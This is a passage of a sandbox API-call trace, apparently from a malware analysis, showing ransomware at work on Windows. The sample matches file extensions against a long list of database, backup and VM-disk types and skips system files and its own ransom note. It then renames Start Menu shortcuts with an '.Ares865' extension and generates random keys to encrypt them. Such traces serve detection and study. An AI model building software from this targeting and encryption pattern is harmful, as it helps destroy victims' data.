[0066.901] lstrcmpiW (lpString1="lnk", lpString2="gwi") returned 1 [0066.901] lstrlenW (lpString="hdb") returned 3 [0066.901] lstrcmpiW (lpString1="lnk", lpString2="hdb") returned 1 [0066.901] lstrlenW (lpString="his") returned 3 [0066.901] lstrcmpiW (lpString1="lnk", lpString2="his") returned 1 [0066.901] lstrlenW (lpString="ib") returned 2 [0066.901] lstrcmpiW (lpString1="nk", lpString2="ib") returned 1 [0066.901] lstrlenW (lpString="idb") returned 3 [0066.901] lstrcmpiW (lpString1="lnk", lpString2="idb") returned 1 [0066.901] lstrlenW (lpString="ihx") returned 3 [0066.901] lstrcmpiW (lpString1="lnk", lpString2="ihx") returned 1 [0066.901] lstrlenW (lpString="itdb") returned 4 [0066.901] lstrcmpiW (lpString1=".lnk", lpString2="itdb") returned -1 [0066.901] lstrlenW (lpString="itw") returned 3 [0066.901] lstrcmpiW (lpString1="lnk", lpString2="itw") returned 1 [0066.901] lstrlenW (lpString="jet") returned 3 [0066.901] lstrcmpiW (lpString1="lnk", lpString2="jet") returned 1 [0066.901] lstrlenW (lpString="jtx") returned 3 [0066.902] lstrcmpiW (lpString1="lnk", lpString2="jtx") returned 1 [0066.902] lstrlenW (lpString="kdb") returned 3 [0066.902] lstrcmpiW (lpString1="lnk", lpString2="kdb") returned 1 [0066.902] lstrlenW (lpString="kexi") returned 4 [0066.902] lstrcmpiW (lpString1=".lnk", lpString2="kexi") returned -1 [0066.902] lstrlenW (lpString="kexic") returned 5 [0066.902] lstrcmpiW (lpString1="0.lnk", lpString2="kexic") returned -1 [0066.902] lstrlenW (lpString="kexis") returned 5 [0066.902] lstrcmpiW (lpString1="0.lnk", lpString2="kexis") returned -1 [0066.902] lstrlenW (lpString="lgc") returned 3 [0066.902] lstrcmpiW (lpString1="lnk", lpString2="lgc") returned 1 [0066.902] lstrlenW (lpString="lwx") returned 3 [0066.902] lstrcmpiW (lpString1="lnk", lpString2="lwx") returned -1 [0066.902] lstrlenW (lpString="maf") returned 3 [0066.902] lstrcmpiW (lpString1="lnk", lpString2="maf") returned -1 [0066.902] lstrlenW (lpString="maq") returned 3 [0066.902] lstrcmpiW (lpString1="lnk", lpString2="maq") returned -1 [0066.902] lstrlenW (lpString="mar") returned 3 [0066.902] lstrcmpiW (lpString1="lnk", lpString2="mar") returned -1 [0066.902] lstrlenW (lpString="marshal") returned 7 [0066.902] lstrcmpiW (lpString1="010.lnk", lpString2="marshal") returned -1 [0066.902] lstrlenW (lpString="mas") returned 3 [0066.902] lstrcmpiW (lpString1="lnk", lpString2="mas") returned -1 [0066.902] lstrlenW (lpString="mav") returned 3 [0066.902] lstrcmpiW (lpString1="lnk", lpString2="mav") returned -1 [0066.902] lstrlenW (lpString="maw") returned 3 [0066.902] lstrcmpiW (lpString1="lnk", lpString2="maw") returned -1 [0066.902] lstrlenW (lpString="mdbhtml") returned 7 [0066.902] lstrcmpiW (lpString1="010.lnk", lpString2="mdbhtml") returned -1 [0066.903] lstrlenW (lpString="mdn") returned 3 [0066.903] lstrcmpiW (lpString1="lnk", lpString2="mdn") returned -1 [0066.903] lstrlenW (lpString="mdt") returned 3 [0066.903] lstrcmpiW (lpString1="lnk", lpString2="mdt") returned -1 [0066.903] lstrlenW (lpString="mfd") returned 3 [0066.903] lstrcmpiW (lpString1="lnk", lpString2="mfd") returned -1 [0066.903] lstrlenW (lpString="mpd") returned 3 [0066.903] lstrcmpiW (lpString1="lnk", lpString2="mpd") returned -1 [0066.903] lstrlenW (lpString="mrg") returned 3 [0066.903] lstrcmpiW (lpString1="lnk", lpString2="mrg") returned -1 [0066.903] lstrlenW (lpString="mud") returned 3 [0066.903] lstrcmpiW (lpString1="lnk", lpString2="mud") returned -1 [0066.903] lstrlenW (lpString="mwb") returned 3 [0066.903] lstrcmpiW (lpString1="lnk", lpString2="mwb") returned -1 [0066.903] lstrlenW (lpString="myd") returned 3 [0066.903] lstrcmpiW (lpString1="lnk", lpString2="myd") returned -1 [0066.903] lstrlenW (lpString="ndf") returned 3 [0066.903] lstrcmpiW (lpString1="lnk", lpString2="ndf") returned -1 [0066.903] lstrlenW (lpString="nnt") returned 3 [0066.903] lstrcmpiW (lpString1="lnk", lpString2="nnt") returned -1 [0066.903] lstrlenW (lpString="nrmlib") returned 6 [0066.903] lstrcmpiW (lpString1="10.lnk", lpString2="nrmlib") returned -1 [0066.903] lstrlenW (lpString="ns2") returned 3 [0066.903] lstrcmpiW (lpString1="lnk", lpString2="ns2") returned -1 [0066.903] lstrlenW (lpString="ns3") returned 3 [0066.903] lstrcmpiW (lpString1="lnk", lpString2="ns3") returned -1 [0066.903] lstrlenW (lpString="ns4") returned 3 [0066.903] lstrcmpiW (lpString1="lnk", lpString2="ns4") returned -1 [0066.903] lstrlenW (lpString="nsf") returned 3 [0066.903] lstrcmpiW (lpString1="lnk", lpString2="nsf") returned -1 [0066.903] lstrlenW (lpString="nv") returned 2 [0066.903] lstrcmpiW (lpString1="nk", lpString2="nv") returned -1 [0066.903] lstrlenW (lpString="nv2") returned 3 [0066.903] lstrcmpiW (lpString1="lnk", lpString2="nv2") returned -1 [0066.903] lstrlenW (lpString="nwdb") returned 4 [0066.903] lstrcmpiW (lpString1=".lnk", lpString2="nwdb") returned -1 [0066.903] lstrlenW (lpString="nyf") returned 3 [0066.904] lstrcmpiW (lpString1="lnk", lpString2="nyf") returned -1 [0066.904] lstrlenW (lpString="odb") returned 3 [0066.904] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0066.904] lstrlenW (lpString="odb") returned 3 [0066.904] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0066.904] lstrlenW (lpString="oqy") returned 3 [0066.904] lstrcmpiW (lpString1="lnk", lpString2="oqy") returned -1 [0066.904] lstrlenW (lpString="ora") returned 3 [0066.904] lstrcmpiW (lpString1="lnk", lpString2="ora") returned -1 [0066.904] lstrlenW (lpString="orx") returned 3 [0066.904] lstrcmpiW (lpString1="lnk", lpString2="orx") returned -1 [0066.904] lstrlenW (lpString="owc") returned 3 [0066.904] lstrcmpiW (lpString1="lnk", lpString2="owc") returned -1 [0066.904] lstrlenW (lpString="p96") returned 3 [0066.904] lstrcmpiW (lpString1="lnk", lpString2="p96") returned -1 [0066.904] lstrlenW (lpString="p97") returned 3 [0066.904] lstrcmpiW (lpString1="lnk", lpString2="p97") returned -1 [0066.904] lstrlenW (lpString="pan") returned 3 [0066.904] lstrcmpiW (lpString1="lnk", lpString2="pan") returned -1 [0066.904] lstrlenW (lpString="pdb") returned 3 [0066.904] lstrcmpiW (lpString1="lnk", lpString2="pdb") returned -1 [0066.904] lstrlenW (lpString="pdm") returned 3 [0066.904] lstrcmpiW (lpString1="lnk", lpString2="pdm") returned -1 [0066.904] lstrlenW (lpString="pnz") returned 3 [0066.904] lstrcmpiW (lpString1="lnk", lpString2="pnz") returned -1 [0066.904] lstrlenW (lpString="qry") returned 3 [0066.904] lstrcmpiW (lpString1="lnk", lpString2="qry") returned -1 [0066.904] lstrlenW (lpString="qvd") returned 3 [0066.904] lstrcmpiW (lpString1="lnk", lpString2="qvd") returned -1 [0066.904] lstrlenW (lpString="rbf") returned 3 [0066.904] lstrcmpiW (lpString1="lnk", lpString2="rbf") returned -1 [0066.904] lstrlenW (lpString="rctd") returned 4 [0066.904] lstrcmpiW (lpString1=".lnk", lpString2="rctd") returned -1 [0066.904] lstrlenW (lpString="rod") returned 3 [0066.904] lstrcmpiW (lpString1="lnk", lpString2="rod") returned -1 [0066.904] lstrlenW (lpString="rodx") returned 4 [0066.904] lstrcmpiW (lpString1=".lnk", lpString2="rodx") returned -1 [0066.904] lstrlenW (lpString="rpd") returned 3 [0066.905] lstrcmpiW (lpString1="lnk", lpString2="rpd") returned -1 [0066.905] lstrlenW (lpString="rsd") returned 3 [0066.905] lstrcmpiW (lpString1="lnk", lpString2="rsd") returned -1 [0066.905] lstrlenW (lpString="sas7bdat") returned 8 [0066.905] lstrcmpiW (lpString1="2010.lnk", lpString2="sas7bdat") returned -1 [0066.905] lstrlenW (lpString="sbf") returned 3 [0066.905] lstrcmpiW (lpString1="lnk", lpString2="sbf") returned -1 [0066.905] lstrlenW (lpString="scx") returned 3 [0066.905] lstrcmpiW (lpString1="lnk", lpString2="scx") returned -1 [0066.905] lstrlenW (lpString="sdb") returned 3 [0066.905] lstrcmpiW (lpString1="lnk", lpString2="sdb") returned -1 [0066.905] lstrlenW (lpString="sdc") returned 3 [0066.905] lstrcmpiW (lpString1="lnk", lpString2="sdc") returned -1 [0066.905] lstrlenW (lpString="sdf") returned 3 [0066.905] lstrcmpiW (lpString1="lnk", lpString2="sdf") returned -1 [0066.905] lstrlenW (lpString="sis") returned 3 [0066.905] lstrcmpiW (lpString1="lnk", lpString2="sis") returned -1 [0066.905] lstrlenW (lpString="spq") returned 3 [0066.905] lstrcmpiW (lpString1="lnk", lpString2="spq") returned -1 [0066.905] lstrlenW (lpString="te") returned 2 [0066.905] lstrcmpiW (lpString1="nk", lpString2="te") returned -1 [0066.905] lstrlenW (lpString="teacher") returned 7 [0066.905] lstrcmpiW (lpString1="010.lnk", lpString2="teacher") returned -1 [0066.905] lstrlenW (lpString="tmd") returned 3 [0066.905] lstrcmpiW (lpString1="lnk", lpString2="tmd") returned -1 [0066.905] lstrlenW (lpString="tps") returned 3 [0066.905] lstrcmpiW (lpString1="lnk", lpString2="tps") returned -1 [0066.905] lstrlenW (lpString="trc") returned 3 [0066.905] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0066.905] lstrlenW (lpString="trc") returned 3 [0066.905] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0066.905] lstrlenW (lpString="trm") returned 3 [0066.905] lstrcmpiW (lpString1="lnk", lpString2="trm") returned -1 [0066.905] lstrlenW (lpString="udb") returned 3 [0066.905] lstrcmpiW (lpString1="lnk", lpString2="udb") returned -1 [0066.905] lstrlenW (lpString="udl") returned 3 [0066.905] lstrcmpiW (lpString1="lnk", lpString2="udl") returned -1 [0066.905] lstrlenW (lpString="usr") returned 3 [0066.905] lstrcmpiW (lpString1="lnk", lpString2="usr") returned -1 [0066.906] lstrlenW (lpString="v12") returned 3 [0066.906] lstrcmpiW (lpString1="lnk", lpString2="v12") returned -1 [0066.906] lstrlenW (lpString="vis") returned 3 [0066.906] lstrcmpiW (lpString1="lnk", lpString2="vis") returned -1 [0066.906] lstrlenW (lpString="vpd") returned 3 [0066.906] lstrcmpiW (lpString1="lnk", lpString2="vpd") returned -1 [0066.906] lstrlenW (lpString="vvv") returned 3 [0066.906] lstrcmpiW (lpString1="lnk", lpString2="vvv") returned -1 [0066.906] lstrlenW (lpString="wdb") returned 3 [0066.906] lstrcmpiW (lpString1="lnk", lpString2="wdb") returned -1 [0066.906] lstrlenW (lpString="wmdb") returned 4 [0066.906] lstrcmpiW (lpString1=".lnk", lpString2="wmdb") returned -1 [0066.906] lstrlenW (lpString="wrk") returned 3 [0066.906] lstrcmpiW (lpString1="lnk", lpString2="wrk") returned -1 [0066.906] lstrlenW (lpString="xdb") returned 3 [0066.906] lstrcmpiW (lpString1="lnk", lpString2="xdb") returned -1 [0066.906] lstrlenW (lpString="xld") returned 3 [0066.906] lstrcmpiW (lpString1="lnk", lpString2="xld") returned -1 [0066.906] lstrlenW (lpString="xmlff") returned 5 [0066.906] lstrcmpiW (lpString1="0.lnk", lpString2="xmlff") returned -1 [0066.906] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Excel 2010.lnk.Ares865") returned 88 [0066.906] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Excel 2010.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft excel 2010.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Excel 2010.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft excel 2010.lnk.ares865"), dwFlags=0x1) returned 1 [0066.907] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Excel 2010.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft excel 2010.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.907] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2951) returned 1 [0066.907] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0066.908] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0066.908] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0066.908] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0066.909] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.909] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.909] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe90, lpName=0x0) returned 0x120 [0066.910] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe90) returned 0x420000 [0066.911] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0066.912] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.912] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0066.912] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0066.912] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0066.912] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0066.912] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0066.912] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0066.912] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0066.912] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0066.912] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0066.912] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0066.912] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0066.912] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0066.912] CloseHandle (hObject=0x120) returned 1 [0066.912] CloseHandle (hObject=0x12c) returned 1 [0066.912] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0066.912] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0066.912] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0066.913] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7805e570, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7805e570, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7805e570, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0xbe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft InfoPath Designer 2010.lnk", cAlternateFileName="MIA4FF~1.LNK")) returned 1 [0066.913] lstrcmpiW (lpString1="Microsoft InfoPath Designer 2010.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0066.913] lstrcmpiW (lpString1="Microsoft InfoPath Designer 2010.lnk", lpString2="aoldtz.exe") returned 1 [0066.913] lstrcmpiW (lpString1="Microsoft InfoPath Designer 2010.lnk", lpString2=".") returned 1 [0066.913] lstrcmpiW (lpString1="Microsoft InfoPath Designer 2010.lnk", lpString2="..") returned 1 [0066.913] lstrcmpiW (lpString1="Microsoft InfoPath Designer 2010.lnk", lpString2="windows") returned -1 [0066.913] lstrcmpiW (lpString1="Microsoft InfoPath Designer 2010.lnk", lpString2="bootmgr") returned 1 [0066.913] lstrcmpiW (lpString1="Microsoft InfoPath Designer 2010.lnk", lpString2="temp") returned -1 [0066.913] lstrcmpiW (lpString1="Microsoft InfoPath Designer 2010.lnk", lpString2="pagefile.sys") returned -1 [0066.913] lstrcmpiW (lpString1="Microsoft InfoPath Designer 2010.lnk", lpString2="boot") returned 1 [0066.913] lstrcmpiW (lpString1="Microsoft InfoPath Designer 2010.lnk", lpString2="ids.txt") returned 1 [0066.913] lstrcmpiW (lpString1="Microsoft InfoPath Designer 2010.lnk", lpString2="ntuser.dat") returned -1 [0066.913] lstrcmpiW (lpString1="Microsoft InfoPath Designer 2010.lnk", lpString2="perflogs") returned -1 [0066.913] lstrcmpiW (lpString1="Microsoft InfoPath Designer 2010.lnk", lpString2="MSBuild") returned -1 [0066.913] lstrlenW (lpString="Microsoft InfoPath Designer 2010.lnk") returned 36 [0066.913] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Excel 2010.lnk") returned 80 [0066.913] lstrcpyW (in: lpString1=0x2cce470, lpString2="Microsoft InfoPath Designer 2010.lnk" | out: lpString1="Microsoft InfoPath Designer 2010.lnk") returned="Microsoft InfoPath Designer 2010.lnk" [0066.913] lstrlenW (lpString="Microsoft InfoPath Designer 2010.lnk") returned 36 [0066.913] lstrlenW (lpString="Ares865") returned 7 [0066.913] lstrcmpiW (lpString1="010.lnk", lpString2="Ares865") returned -1 [0066.913] lstrlenW (lpString=".dll") returned 4 [0066.913] lstrcmpiW (lpString1="Microsoft InfoPath Designer 2010.lnk", lpString2=".dll") returned 1 [0066.913] lstrlenW (lpString=".lnk") returned 4 [0066.913] lstrcmpiW (lpString1="Microsoft InfoPath Designer 2010.lnk", lpString2=".lnk") returned 1 [0066.913] lstrlenW (lpString=".ini") returned 4 [0066.913] lstrcmpiW (lpString1="Microsoft InfoPath Designer 2010.lnk", lpString2=".ini") returned 1 [0066.913] lstrlenW (lpString=".sys") returned 4 [0066.913] lstrcmpiW (lpString1="Microsoft InfoPath Designer 2010.lnk", lpString2=".sys") returned 1 [0066.913] lstrlenW (lpString="Microsoft InfoPath Designer 2010.lnk") returned 36 [0066.913] lstrlenW (lpString="bak") returned 3 [0066.913] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0066.913] lstrlenW (lpString="ba_") returned 3 [0066.913] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0066.913] lstrlenW (lpString="dbb") returned 3 [0066.914] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0066.914] lstrlenW (lpString="vmdk") returned 4 [0066.914] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0066.914] lstrlenW (lpString="rar") returned 3 [0066.914] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0066.914] lstrlenW (lpString="zip") returned 3 [0066.914] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0066.914] lstrlenW (lpString="tgz") returned 3 [0066.914] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0066.914] lstrlenW (lpString="vbox") returned 4 [0066.914] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0066.914] lstrlenW (lpString="vdi") returned 3 [0066.914] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0066.914] lstrlenW (lpString="vhd") returned 3 [0066.914] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0066.914] lstrlenW (lpString="vhdx") returned 4 [0066.914] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0066.914] lstrlenW (lpString="avhd") returned 4 [0066.914] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0066.914] lstrlenW (lpString="db") returned 2 [0066.914] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0066.914] lstrlenW (lpString="db2") returned 3 [0066.914] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0066.914] lstrlenW (lpString="db3") returned 3 [0066.914] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0066.914] lstrlenW (lpString="dbf") returned 3 [0066.914] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0066.914] lstrlenW (lpString="mdf") returned 3 [0066.914] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0066.914] lstrlenW (lpString="mdb") returned 3 [0066.914] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0066.914] lstrlenW (lpString="sql") returned 3 [0066.914] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0066.914] lstrlenW (lpString="sqlite") returned 6 [0066.914] lstrcmpiW (lpString1="10.lnk", lpString2="sqlite") returned -1 [0066.914] lstrlenW (lpString="sqlite3") returned 7 [0066.914] lstrcmpiW (lpString1="010.lnk", lpString2="sqlite3") returned -1 [0066.915] lstrlenW (lpString="sqlitedb") returned 8 [0066.915] lstrcmpiW (lpString1="2010.lnk", lpString2="sqlitedb") returned -1 [0066.915] lstrlenW (lpString="xml") returned 3 [0066.915] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0066.915] lstrlenW (lpString="$er") returned 3 [0066.915] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0066.915] lstrlenW (lpString="4dd") returned 3 [0066.915] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0066.915] lstrlenW (lpString="4dl") returned 3 [0066.915] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0066.915] lstrlenW (lpString="^^^") returned 3 [0066.915] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0066.915] lstrlenW (lpString="abs") returned 3 [0066.915] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0066.915] lstrlenW (lpString="abx") returned 3 [0066.915] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0066.915] lstrlenW (lpString="accdb") returned 5 [0066.915] lstrcmpiW (lpString1="0.lnk", lpString2="accdb") returned -1 [0066.915] lstrlenW (lpString="accdc") returned 5 [0066.915] lstrcmpiW (lpString1="0.lnk", lpString2="accdc") returned -1 [0066.915] lstrlenW (lpString="accde") returned 5 [0066.915] lstrcmpiW (lpString1="0.lnk", lpString2="accde") returned -1 [0066.915] lstrlenW (lpString="accdr") returned 5 [0066.915] lstrcmpiW (lpString1="0.lnk", lpString2="accdr") returned -1 [0066.915] lstrlenW (lpString="accdt") returned 5 [0066.915] lstrcmpiW (lpString1="0.lnk", lpString2="accdt") returned -1 [0066.915] lstrlenW (lpString="accdw") returned 5 [0066.915] lstrcmpiW (lpString1="0.lnk", lpString2="accdw") returned -1 [0066.915] lstrlenW (lpString="accft") returned 5 [0066.915] lstrcmpiW (lpString1="0.lnk", lpString2="accft") returned -1 [0066.915] lstrlenW (lpString="adb") returned 3 [0066.915] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0066.915] lstrlenW (lpString="adb") returned 3 [0066.915] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0066.915] lstrlenW (lpString="ade") returned 3 [0066.915] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0066.915] lstrlenW (lpString="adf") returned 3 [0066.916] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0066.916] lstrlenW (lpString="adn") returned 3 [0066.916] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0066.916] lstrlenW (lpString="adp") returned 3 [0066.916] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0066.916] lstrlenW (lpString="alf") returned 3 [0066.916] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0066.916] lstrlenW (lpString="ask") returned 3 [0066.916] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0066.916] lstrlenW (lpString="btr") returned 3 [0066.916] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0066.916] lstrlenW (lpString="cat") returned 3 [0066.916] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0066.916] lstrlenW (lpString="cdb") returned 3 [0066.916] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0066.916] lstrlenW (lpString="ckp") returned 3 [0066.916] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0066.916] lstrlenW (lpString="cma") returned 3 [0066.916] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0066.916] lstrlenW (lpString="cpd") returned 3 [0066.916] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0066.916] lstrlenW (lpString="dacpac") returned 6 [0066.916] lstrcmpiW (lpString1="10.lnk", lpString2="dacpac") returned -1 [0066.916] lstrlenW (lpString="dad") returned 3 [0066.916] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0066.916] lstrlenW (lpString="dadiagrams") returned 10 [0066.916] lstrcmpiW (lpString1="r 2010.lnk", lpString2="dadiagrams") returned 1 [0066.916] lstrlenW (lpString="daschema") returned 8 [0066.916] lstrcmpiW (lpString1="2010.lnk", lpString2="daschema") returned -1 [0066.916] lstrlenW (lpString="db-journal") returned 10 [0066.916] lstrcmpiW (lpString1="r 2010.lnk", lpString2="db-journal") returned 1 [0066.916] lstrlenW (lpString="db-shm") returned 6 [0066.916] lstrcmpiW (lpString1="10.lnk", lpString2="db-shm") returned -1 [0066.916] lstrlenW (lpString="db-wal") returned 6 [0066.916] lstrcmpiW (lpString1="10.lnk", lpString2="db-wal") returned -1 [0066.916] lstrlenW (lpString="dbc") returned 3 [0066.916] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0066.916] lstrlenW (lpString="dbs") returned 3 [0066.917] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0066.917] lstrlenW (lpString="dbt") returned 3 [0066.917] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0066.917] lstrlenW (lpString="dbv") returned 3 [0066.917] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0066.917] lstrlenW (lpString="dbx") returned 3 [0066.917] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0066.917] lstrlenW (lpString="dcb") returned 3 [0066.917] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0066.917] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft InfoPath Designer 2010.lnk.Ares865") returned 100 [0066.917] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft InfoPath Designer 2010.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft infopath designer 2010.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft InfoPath Designer 2010.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft infopath designer 2010.lnk.ares865"), dwFlags=0x1) returned 1 [0066.918] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft InfoPath Designer 2010.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft infopath designer 2010.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.918] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3042) returned 1 [0066.918] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0066.919] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0066.919] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0066.919] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0066.919] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 